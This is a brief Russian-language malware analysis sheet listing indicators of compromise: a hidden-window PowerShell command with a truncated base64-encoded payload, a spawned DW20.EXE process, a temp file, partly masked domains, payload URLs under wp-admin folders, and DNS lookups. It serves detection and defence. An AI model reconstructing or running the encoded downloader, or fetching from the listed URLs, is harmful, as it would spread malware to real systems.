Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEUAQwBOAEMAbgBtAGMAPQAnAEIAWABKAE0ASgBnAGgAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQBUAHkAcABgAFIAYABvAHQAbwBgAGMAbwBsACIAIAA9AC...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1504
- %TEMP%\565924.cvr
- 'va####ebuilders.com':80
- 'cs####ldersllc.com':80
- http://va####ebuilders.com/wp-admin/e2ky_18j8_wn4v/
- http://va####ebuilders.com/wp-admin/e2ky_18j8_wn4v
- http://cs####ldersllc.com/wp-admin/teqvm_n0yai_84/
- http://cs####ldersllc.com/wp-admin/teqvm_n0yai_84
- DNS ASK el###sstore.com
- DNS ASK lu###me247.com
- DNS ASK va####ebuilders.com
- DNS ASK de#####ngveterans.com
- DNS ASK cs####ldersllc.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABLAEUAQwBOAEMAbgBtAGMAPQAnAEIAWABKAE0ASgBnAGgAYgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGUAYwBVAHIASQBUAHkAcABgAFIAYABvAHQAbwBgAGMAbwBsACIAIAA9AC... (со скрытым окном)